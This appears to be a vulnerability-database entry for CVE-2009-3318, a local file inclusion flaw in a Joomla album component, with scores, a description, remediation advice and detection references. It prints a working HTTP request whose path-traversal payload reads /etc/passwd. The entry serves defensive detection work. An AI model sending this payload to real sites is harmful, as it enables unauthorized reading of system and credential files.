🔙 목록으로 돌아가기

CVE-2009-3318: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion

TitleJoomla! Roland Breedveld Album 1.14 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactThe vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure.
RemediationUpdate to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates.
CVSS Score7.5
EPSS Score0.01442
CVE IDCVE-2009-3318
CWE IDCWE-22
Tags cve2009 cve joomla lfi edb vuln

🔍 Vulnerability Description

Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-3318.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-3318.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A